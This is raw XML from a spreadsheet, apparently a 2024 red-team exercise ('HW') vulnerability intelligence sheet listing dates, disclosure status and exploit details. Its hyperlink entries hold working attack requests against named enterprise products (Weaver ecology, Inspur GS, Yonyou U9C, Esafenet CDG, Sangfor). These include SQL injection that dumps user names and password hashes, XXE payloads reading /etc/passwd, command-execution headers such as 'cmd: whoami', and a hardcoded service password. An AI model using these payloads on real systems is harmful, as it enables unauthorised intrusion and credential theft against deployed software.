      <c r="B220" s="3" t="s">
        <v>485</v>
      </c>
      <c r="C220" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D220" s="3" t="s">
        <v>486</v>
      </c>
      <c r="E220" s="19" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="221" customHeight="1" spans="1:5">
      <c r="A221" s="13">
        <v>45518</v>
      </c>
      <c r="B221" s="3" t="s">
        <v>488</v>
      </c>
      <c r="C221" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D221" s="3" t="s">
        <v>489</v>
      </c>
      <c r="E221" s="10" t="s">
        <v>490</v>
      </c>
    </row>
    <row r="222" customHeight="1" spans="1:5">
      <c r="A222" s="13">
        <v>45518</v>
      </c>
      <c r="B222" s="3" t="s">
        <v>491</v>
      </c>
      <c r="C222" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D222" s="3" t="s">
        <v>492</v>
      </c>
      <c r="E222" s="10" t="s">
        <v>493</v>
      </c>
    </row>
    <row r="223" customHeight="1" spans="1:5">
      <c r="A223" s="13">
        <v>45518</v>
      </c>
      <c r="B223" s="3" t="s">
        <v>494</v>
      </c>
      <c r="C223" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D223" s="3" t="s">
        <v>259</v>
      </c>
      <c r="E223" s="10" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="224" customHeight="1" spans="1:5">
      <c r="A224" s="13">
        <v>45518</v>
      </c>
      <c r="B224" s="3" t="s">
        <v>496</v>
      </c>
      <c r="C224" s="14" t="s">
        <v>8</v>
      </c>
      <c r="E224" s="10" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="225" customHeight="1" spans="1:5">
      <c r="A225" s="13">
        <v>45519</v>
      </c>
      <c r="B225" s="3" t="s">
        <v>498</v>
      </c>
      <c r="C225" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D225" s="3" t="s">
        <v>499</v>
      </c>
      <c r="E225" s="10" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="226" customHeight="1" spans="1:5">
      <c r="A226" s="13">
        <v>45519</v>
      </c>
      <c r="B226" s="3" t="s">
        <v>501</v>
      </c>
      <c r="C226" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D226" s="3" t="s">
        <v>125</v>
      </c>
      <c r="E226" s="10" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="227" customHeight="1" spans="1:5">
      <c r="A227" s="13">
        <v>45519</v>
      </c>
      <c r="B227" s="3" t="s">
        <v>503</v>
      </c>
      <c r="C227" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D227" s="3" t="s">
        <v>504</v>
      </c>
      <c r="E227" s="10" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="228" customHeight="1" spans="1:5">
      <c r="A228" s="13">
        <v>45519</v>
      </c>
      <c r="B228" s="3" t="s">
        <v>506</v>
      </c>
      <c r="C228" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D228" s="3" t="s">
        <v>504</v>
      </c>
      <c r="E228" s="10" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="229" customHeight="1" spans="1:5">
      <c r="A229" s="13">
        <v>45519</v>
      </c>
      <c r="B229" s="3" t="s">
        <v>508</v>
      </c>
      <c r="C229" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D229" s="3" t="s">
        <v>504</v>
      </c>
      <c r="E229" s="10" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="230" customHeight="1" spans="1:5">
      <c r="A230" s="13">
        <v>45519</v>
      </c>
      <c r="B230" s="3" t="s">
        <v>510</v>
      </c>
      <c r="C230" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D230" s="3" t="s">
        <v>511</v>
      </c>
      <c r="E230" s="10" t="s">
        <v>512</v>
      </c>
    </row>
    <row r="231" customHeight="1" spans="1:5">
      <c r="A231" s="13">
        <v>45519</v>
      </c>
      <c r="B231" s="2" t="s">
        <v>513</v>
      </c>
      <c r="C231" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D231" s="3" t="s">
        <v>514</v>
      </c>
      <c r="E231" s="10" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="232" customHeight="1" spans="1:3">
      <c r="A232" s="13">
        <v>45519</v>
      </c>
      <c r="B232" s="2" t="s">
        <v>516</v>
      </c>
      <c r="C232" s="14" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="233" customHeight="1" spans="1:5">
      <c r="A233" s="13">
        <v>45520</v>
      </c>
      <c r="B233" s="2" t="s">
        <v>517</v>
      </c>
      <c r="C233" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D233" s="20" t="s">
        <v>131</v>
      </c>
      <c r="E233" s="10" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="234" customHeight="1" spans="1:5">
      <c r="A234" s="13">
        <v>45520</v>
      </c>
      <c r="B234" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C234" s="14" t="s">
        <v>8</v>
      </c>
      <c r="E234" s="10" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="235" customHeight="1" spans="1:5">
      <c r="A235" s="13">
        <v>45520</v>
      </c>
      <c r="B235" s="12" t="s">
        <v>520</v>
      </c>
      <c r="C235" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D235" s="3" t="s">
        <v>437</v>
      </c>
      <c r="E235" s="10" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="236" customHeight="1" spans="1:3">
      <c r="A236" s="13">
        <v>45520</v>
      </c>
      <c r="B236" s="8" t="s">
        <v>522</v>
      </c>
      <c r="C236" s="14" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="237" customHeight="1" spans="1:5">
      <c r="A237" s="13">
        <v>45520</v>
      </c>
      <c r="B237" s="2" t="s">
        <v>523</v>
      </c>
      <c r="C237" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D237" s="3" t="s">
        <v>149</v>
      </c>
      <c r="E237" s="10" t="s">
        <v>524</v>
      </c>
    </row>
    <row r="238" customHeight="1" spans="1:3">
      <c r="A238" s="13">
        <v>45520</v>
      </c>
      <c r="B238" s="8" t="s">
        <v>525</v>
      </c>
      <c r="C238" s="14" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="239" customHeight="1" spans="1:5">
      <c r="A239" s="13">
        <v>45520</v>
      </c>
      <c r="B239" s="2" t="s">
        <v>526</v>
      </c>
      <c r="C239" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D239" s="3" t="s">
        <v>527</v>
      </c>
      <c r="E239" s="10" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="240" customHeight="1" spans="1:5">
      <c r="A240" s="13">
        <v>45520</v>
      </c>
      <c r="B240" s="2" t="s">
        <v>529</v>
      </c>
      <c r="C240" s="14" t="s">
        <v>8</v>
      </c>
      <c r="E240" s="10" t="s">
        <v>530</v>
      </c>
    </row>
    <row r="241" customHeight="1" spans="1:5">
      <c r="A241" s="13">
        <v>45520</v>
      </c>
      <c r="B241" s="2" t="s">
        <v>531</v>
      </c>
      <c r="C241" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D241" s="3" t="s">
        <v>532</v>
      </c>
      <c r="E241" s="21" t="s">
        <v>533</v>
      </c>
    </row>
    <row r="242" customHeight="1" spans="1:5">
      <c r="A242" s="13">
        <v>45520</v>
      </c>
      <c r="B242" s="2" t="s">
        <v>534</v>
      </c>
      <c r="C242" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D242" s="3" t="s">
        <v>535</v>
      </c>
      <c r="E242" s="10" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="243" customHeight="1" spans="1:5">
      <c r="A243" s="13">
        <v>45520</v>
      </c>
      <c r="B243" s="2" t="s">
        <v>537</v>
      </c>
      <c r="C243" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D243" s="3" t="s">
        <v>189</v>
      </c>
      <c r="E243" s="10" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="244" customHeight="1" spans="1:5">
      <c r="A244" s="13">
        <v>45520</v>
      </c>
      <c r="B244" s="2" t="s">
        <v>539</v>
      </c>
      <c r="C244" s="14" t="s">
        <v>8</v>
      </c>
      <c r="D244" s="3" t="s">
        <v>540</v>
      </c>
      <c r="E244" s="10" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="245" customHeight="1" spans="1:3">
      <c r="A245" s="13"/>
      <c r="C245" s="14"/>
    </row>
    <row r="246" customHeight="1" spans="1:3">
      <c r="A246" s="13"/>
      <c r="C246" s="14"/>
    </row>
    <row r="247" customHeight="1" spans="1:3">
      <c r="A247" s="13"/>
      <c r="C247" s="14"/>
    </row>
    <row r="248" customHeight="1" spans="1:3">
      <c r="A248" s="13"/>
      <c r="C248" s="14"/>
    </row>
    <row r="249" customHeight="1" spans="1:3">
      <c r="A249" s="13"/>
      <c r="C249" s="14"/>
    </row>
    <row r="250" customHeight="1" spans="1:3">
      <c r="A250" s="13"/>
      <c r="C250" s="14"/>
    </row>
    <row r="251" customHeight="1" spans="1:3">
      <c r="A251" s="13"/>
      <c r="C251" s="14"/>
    </row>
    <row r="252" customHeight="1" spans="1:3">
      <c r="A252" s="13"/>
      <c r="C252" s="14"/>
    </row>
    <row r="253" customHeight="1" spans="1:3">
      <c r="A253" s="13"/>
      <c r="C253" s="14"/>
    </row>
    <row r="254" customHeight="1" spans="1:3">
      <c r="A254" s="13"/>
      <c r="C254" s="14"/>
    </row>
    <row r="255" customHeight="1" spans="1:3">
      <c r="A255" s="13"/>
      <c r="C255" s="14"/>
    </row>
    <row r="256" customHeight="1" spans="1:3">
      <c r="A256" s="13"/>
      <c r="C256" s="14"/>
    </row>
    <row r="257" customHeight="1" spans="1:3">
      <c r="A257" s="13"/>
      <c r="C257" s="14"/>
    </row>
    <row r="258" customHeight="1" spans="1:3">
      <c r="A258" s="13"/>
      <c r="C258" s="14"/>
    </row>
    <row r="259" customHeight="1" spans="1:3">
      <c r="A259" s="13"/>
      <c r="C259" s="14"/>
    </row>
    <row r="260" customHeight="1" spans="1:3">
      <c r="A260" s="13"/>
      <c r="C260" s="14"/>
    </row>
    <row r="261" customHeight="1" spans="1:3">
      <c r="A261" s="13"/>
      <c r="C261" s="14"/>
    </row>
    <row r="262" customHeight="1" spans="1:3">
      <c r="A262" s="13"/>
      <c r="C262" s="14"/>
    </row>
    <row r="263" customHeight="1" spans="1:3">
      <c r="A263" s="13"/>
      <c r="C263" s="14"/>
    </row>
    <row r="264" customHeight="1" spans="1:3">
      <c r="A264" s="13"/>
      <c r="C264" s="14"/>
    </row>
    <row r="265" customHeight="1" spans="1:3">
      <c r="A265" s="13"/>
      <c r="C265" s="14"/>
    </row>
  </sheetData>
  <dataValidations count="2">
    <dataValidation type="date" operator="between" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="A$1:A$1048576"/>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="C$1:C$1048576">
      <formula1>"公开,未公开,"</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink ref="E4" r:id="rId2" display="POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1&#10;Host: &#10;Content-Type: text/xml; charset=utf-8&#10;Content-Length: 16396&#10;SOAPAction: &quot;http://tempuri.org/GetChildFormAndEntityList&quot;&#10;cmd: whoami&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;GetChildFormAndEntityList xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;      &lt;baseFormID&gt;string&lt;/baseFormID&gt;&#10;      &lt;baseEntityID&gt;string&lt;/baseEntityID&gt;&#10;      &lt;strFormAssignment&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
    <hyperlink ref="E26" r:id="rId3" display="POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1&#10;Host: ip&#10;Content-Type: text/xml; charset=utf-8&#10;SOAPAction: &quot;http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo&quot;&#10;Content-Length: 2918&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;&#10;&lt;soap:Envelope&#10;  xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&#10;  xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;&#10;  xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&#10;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;PostArchiveInfo&#10;      xmlns=&quot;http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx&quot;&#10;    &gt;&#10;      &lt;archiveInfo&#10;      &gt;&amp;#x3c;&amp;#x21;&amp;#x44;&amp;#x4f;&amp;#x43;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x20;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x20;&amp;#x5b;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x21;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x49;&amp;#x54;&amp;#x59;&amp;#x20;&amp;#x73;&amp;#x65;&amp;#x63;&amp;#x72;&amp;#x65;&amp;#x74;&amp;#x20;&amp;#x53;&amp;#x59;&amp;#x53;&amp;#x54;&amp;#x45;&amp;#x4d;&amp;#x20;&amp;#x22;&amp;#x66;&amp;#x69;&amp;#x6c;&amp;#x65;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x77;&amp;#x69;&amp;#x6e;&amp;#x64;&amp;#x6f;&amp;#x77;&amp;#x73;&amp;#x2f;&amp;#x77;&amp;#x69;&amp;#x6e;&amp;#x2e;&amp;#x69;&amp;"/>
    <hyperlink ref="E47" r:id="rId4" display="POST /services/WorkPlanService HTTP/1.1&#10;Content-Length: 430&#10;Cache-Control: max-age=0&#10;Upgrade-Insecure-Requests: 1&#10;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36&#10;(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36&#10;Accept:&#10;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i&#10;mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&#10;Accept-Encoding: gzip, deflate, br&#10;Accept-Language: zh-CN,zh;q=0.9&#10;SOAPAction:&#10;Content-Type: text/xml;charset=UTF-8&#10;Host: 192.168.52.168&#10;Referer: http://192.168.52.168:80/services/WorkPlanService&#10;Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz&#10;Connection: close&#10;&#10;&lt;soapenv:Envelope&#10;xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:web=&quot;webservices.workplan.weaver.com.cn&quot;&gt;&#10;&lt;soapenv:Header/&gt;&#10;&lt;soapenv:Body&gt;&#10;&lt;web:deleteWorkPlan&gt;&#10;&lt;!--type: string--&gt;&#10;&lt;web:in0&gt;(SELECT 8544 FROM&#10;(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)&lt;/web:in0&gt;&#10;&lt;!--type: int--&gt;&#10;&lt;web:in1&gt;22&lt;/web:in1&gt;&#10;&lt;/web:deleteWorkPlan&gt;&#10;&lt;/soapenv:Bo"/>
    <hyperlink ref="E65" r:id="rId5" display="POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1&#10;Host: &#10;User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/61.0.1191.80 Safari/537.36&#10;Content-Type: text/xml; charset=utf-8&#10;SOAPAction: &quot;http://tempuri.org/SavePrintFormatAssign&quot;&#10;cmd: dir&#10; &#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;&lt;soap:Body&gt;&#10;&lt;SavePrintFormatAssign xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;&lt;psBizObj&gt;string&lt;/psBizObj&gt;&#10;&lt;psLxId&gt;string&lt;/psLxId&gt;&#10;&lt;psLxMc&gt;string&lt;/psLxMc&gt;&#10;&lt;printOpByte&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
    <hyperlink ref="E76" r:id="rId4" display="POST /services/HrmServiceHTTP/1.1&#10;Upgrade-Insecure-Requests:1&#10;User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/123.0.6312.88Safari/537.36&#10;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&#10;Accept-Encoding:gzip,deflate,br&#10;Connection:close&#10;SOAPAction:urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo&#10;Content-Type:text/xml;charset=UTF-8&#10;Host:&#10;Content-Length:427&#10;&#10;&lt;soapenv:Envelopexmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;xmlns:hrm=&quot;http://localhost/services/HrmService&quot;&gt;&#10;&lt;soapenv:Header/&gt;&#10;&lt;soapenv:Body&gt;&#10;&lt;hrm:getHrmDepartmentInfo&gt;&#10;&lt;!--type:string--&gt;&#10;&lt;hrm:in0&gt;geroet&lt;/hrm:in0&gt;&#10;&lt;!--type:string--&gt;&#10;&lt;hrm:in1&gt;1)AND(db_name()like'ec%'&lt;/hrm:in1&gt;&#10;&lt;/hrm:getHrmDepartmentInfo&gt;&#10;&lt;/soapenv:Body&gt;&#10;&lt;/soapenv:Envelope&gt;"/>
    <hyperlink ref="E81" r:id="rId6" display="POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1&#10;Host: &#10;Content-Type: text/xml; charset=utf-8&#10;Content-Length: 309&#10;SOAPAction: &quot;http://tempuri.org/GetEnterprise&quot;&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;GetEnterprise xmlns=&quot;http://tempuri.org/&quot; /&gt;&#10;  &lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E103" r:id="rId7" display="POST /WebService/BasicService.asmx HTTP/1.1&#10;Host: &#10;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36&#10;Content-Type: application/x-www-form-urlencoded&#10;SOAPAction: &quot;http://tempuri.org/ExecuteSqlForNone&quot;&#10;Content-Length: 85&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;ExecuteSqlForNone xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;      &lt;sql&gt;waitfor delay '0:0:5'--+&lt;/sql&gt;&#10;      &lt;strParameters&gt;&lt;/strParameters&gt;&#10;      &lt;webservicePassword&gt;{ac80457b-368d-4062-b2dd-ae4d490e1c4b}&lt;/webservicePassword&gt;&#10;    &lt;/ExecuteSqlForNone&gt;&#10;  &lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E107" r:id="rId3" display="POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1&#10;Host: {{Hostname}}&#10;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like&#10;Gecko) Chrome/123.0.6312.88 Safari/537.36&#10;Content-Type: text/xml;charset=UTF-8&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;&lt;soap:Body&gt;&#10;&lt;GetIMDictionary xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;&lt;key&gt;1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from&#10;T_ORG_USER --&lt;/key&gt;&#10;&lt;/GetIMDictionary&gt;&#10;&lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E108" r:id="rId8" display="POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1&#10;Host:&#10;Accept: */* Accept-Language: zh-CN,zh;q=0.9&#10;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36&#10;Content-Type: text/xml; charset=utf-8&#10;Content-Length: 350&#10;SOAPAction: &quot;http://tempuri.org/GetStamp&quot; &#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;&lt;soap:Body&gt;&#10;&lt;GetStamp xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;&lt;usercode&gt;&#10;admin&lt;/usercode&gt;&#10;&lt;/GetStamp&gt;&#10;&lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E138" r:id="rId9" display="需要加密工具：https://github.com/wafinfo/DecryptTools&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;no&quot;?&gt;&#10;&lt;GetCDGAuthoriseTemplet&gt;&#10;&lt;userId&gt;SystemAdmin&lt;/userId&gt;&#10;&lt;secretLevelId&gt;1112233') union select USER_ID,USER_NAME,PWD,SURNAME,'','','','','','','','' &#10;from WF_USER;#&lt;/secretLevelId&gt;&#10;&lt;/GetCDGAuthoriseTemplet&gt;&#10;&#10;以上paylaod需要使用加密工具加密，加密后完整paylaod包：&#10;&#10;POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1&#10;Host: &#10;Cache-Control: max-age=0&#10;Sec-Ch-Ua: &quot;Not:A-Brand&quot;;v=&quot;99&quot;, &quot;Chromium&quot;;v=&quot;112&quot;&#10;Sec-Ch-Ua-Mobile: ?0&#10;Sec-Ch-Ua-Platform: &quot;Windows&quot;&#10;Upgrade-Insecure-Requests: 1&#10;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like &#10;Gecko) Chrome/112.0.5615.138 Safari/537.36&#10;Accept: &#10;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*&#10;/*;q=0.8,application/signed-exchange;v=b3;q=0.7&#10;Sec-Fetch-Site: none&#10;Sec-Fetch-Mode: navigate&#10;Sec-Fetch-User: ?1&#10;Sec-Fetch-Dest: document&#10;Accept-Encoding: gzip, deflate&#10;Accept-Language: zh-CN,zh;q=0.9&#10;Connectio"/>
    <hyperlink ref="D139" r:id="rId10" display="body=&quot;https://bladex.vip/&quot;"/>
    <hyperlink ref="E152" r:id="rId3" display="POST /NPreenManage/NPreenSMSList.asmx HTTP/1.1&#10;Host: &#10;Content-Type: text/xml; charset=utf-8&#10;Content-Length: length&#10;SOAPAction: &quot;RuiGe.WebUi.NPreenSMS/Seach&quot;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;Seach xmlns=&quot;RuiGe.WebUi.NPreenSMS&quot;&gt;&#10;      &lt;sqlwhere&gt;string注入点&lt;/sqlwhere&gt;&#10;    &lt;/Seach&gt;&#10;  &lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E165" r:id="rId4" display="POST /jtcgi/soap_cgi.pyc HTTP/1.1&#10;Host: &#10;User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36&#10;Content-Type: application/xml&#10; &#10;&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&lt;soapenv:Header/&gt;&lt;soapenv:Body&gt;&lt;changeUserPassword&gt;&lt;username&gt;&amp;test;&lt;/username&gt;&lt;curpwd&gt;zzz&lt;/curpwd&gt;&lt;newpwd&gt;zzz123&lt;/newpwd&gt;&lt;/changeUserPassword&gt;&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;&#10;"/>
    <hyperlink ref="E170" r:id="rId11" display="https://support.sangfor.com.cn/productTool/read?product_id=201&amp;id=84&amp;category_id=0"/>
    <hyperlink ref="E180" r:id="rId4" display="POST /jtcgi/soap_cgi.pyc HTTP/1.1&#10;Host: &#10;Accept: */*&#10;Content-Type: application/x-www-form-urlencoded&#10;Accept-Ldwk: bG91ZG9uZ3dlbmt1&#10;User-Agent: curl/8.1.2&#10;Content-Length: 333&#10;&#10;&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&lt;soapenv:Header/&gt;&lt;soapenv:Body&gt;&lt;changeUserPassword&gt;&lt;username&gt;&amp;test;&lt;/username&gt;&lt;curpwd&gt;zzz&lt;/curpwd&gt;&lt;newpwd&gt;zzz123&lt;/newpwd&gt;&lt;/changeUserPassword&gt;&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;"/>
    <hyperlink ref="D184" r:id="rId12" display="body=&quot;http://www.ahkxsoft.com/&quot; &amp;&amp; body=&quot;一卡通登录&quot;"/>
    <hyperlink ref="E184" r:id="rId13" display="POST /DataService.asmx HTTP/1.1&#10;Host: {{Hostname}}&#10;Content-Type: text/xml; charset=utf-8&#10;SOAPAction: &quot;http://tempuri.org/ExeAppCmd&quot;&#10;&#10;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&#10;&lt;soap:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&#10;  &lt;soap:Body&gt;&#10;    &lt;ExeAppCmd xmlns=&quot;http://tempuri.org/&quot;&gt;&#10;      &lt;str&gt;{&quot;cmd&quot;:&quot;get_sb_guanli&quot;,&quot;Type&quot;:&quot;1');WAITFOR DELAY '0:0:4'--&quot;}&lt;/str&gt;&#10;      &lt;files&gt;MTIz&lt;/files&gt;&#10;    &lt;/ExeAppCmd&gt;&#10;  &lt;/soap:Body&gt;&#10;&lt;/soap:Envelope&gt;"/>
    <hyperlink ref="E206" r:id="rId14" display="https://mp.weixin.qq.com/s?__biz=Mzg5MzE4MjAxMw==&amp;mid=2247484321&amp;idx=1&amp;sn=8c37c07c4e4d38925ada43a52c28db3b"/>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2024HW情报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浅离莫笑</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-17T14:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-17T06:28:19Z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3CBE86E9B57046D3B3D11ED4CE2D10FB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.17827</vt:lpwstr>
  </property>
</Properties>
</file>